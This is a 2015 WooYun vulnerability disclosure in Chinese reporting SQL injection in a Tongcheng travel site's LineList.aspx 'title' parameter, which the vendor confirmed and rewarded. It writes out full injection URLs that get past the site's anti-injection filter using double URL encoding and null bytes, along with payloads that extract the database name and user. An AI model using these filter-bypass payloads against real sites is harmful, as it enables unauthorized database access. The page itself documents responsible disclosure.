当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095982

漏洞标题:苏州同程旅游某站点SQL注入及绕过

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: Vigoss_Z

提交时间:2015-02-06 18:40

修复时间:2015-03-23 18:42

公开时间:2015-03-23 18:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 细节已通知厂商并且等待厂商处理中
2015-02-06: 厂商已经确认,细节仅向厂商公开
2015-02-16: 细节向核心白帽子及相关领域专家公开
2015-02-26: 细节向普通白帽子公开
2015-03-08: 细节向实习白帽子公开
2015-03-23: 细节向公众公开

简要描述:

rt

详细说明:

WooYun: 苏州同程六合一系统任意密码查看
http://www.tycts.com/LineList.aspx?title=2015

http://www.tycts.com/LineList.aspx?title=2015%27
您提交的数据中存在非法的字符,请删除后再提交
非 法 字 符:'
提 交 参 数:title
提 交 方 式:Query
操 作 页 面:/LineList.aspx
操 作 I P :
操 作 时 间:2015-2-6 11:23:19
提 交 数 据:2015'


0x1

http://www.tycts.com/LineList.aspx?title=2015%2527
'2015' 附近有语法错误。 字符串 ' AND G.MemberId = 2019021 AND G.IfCheck=3 and G.IfDel =0 Select SCOPE_IDENTITY()' 后的引号不完整。


貌似双重url编码就绕过了?
但是:
0x2

http://www.tycts.com/LineList.aspx?title=2015%27 %2561nd
防注入程序提示您,请勿提交非法字符


0x3

http://www.tycts.com/LineList.aspx?title=2015%2527%00%2561nd
空格使用%00替换
' AND G.AllowWebDirect = 1 AND G.MaxStartDate >= ' 附近有语法错误(mssql+aspx理论上是00-0a都可以,这里0a,09过滤了,%00-%08可行)


0x4

http://www.tycts.com/LineList.aspx?title=2014%2527%2520%2561nd%00%2564b_name%28%29%253e0%00%252d%252d%2520 db_name
http://www.tycts.com/LineList.aspx?title=2014%2527%2520%2561nd%00%2575ser%253e0%00%252d%252d%2520 user

漏洞证明:

00002.JPG

00003.JPG

修复方案:

版权声明:转载请注明来源 Vigoss_Z@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-02-06 22:04

厂商回复:

感谢关注同程旅游,明天会安排修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-08 21:53 | Vigoss_Z ( 普通白帽子 | Rank:404 漏洞数:63 | 楞娃)

    感谢!卡已收到。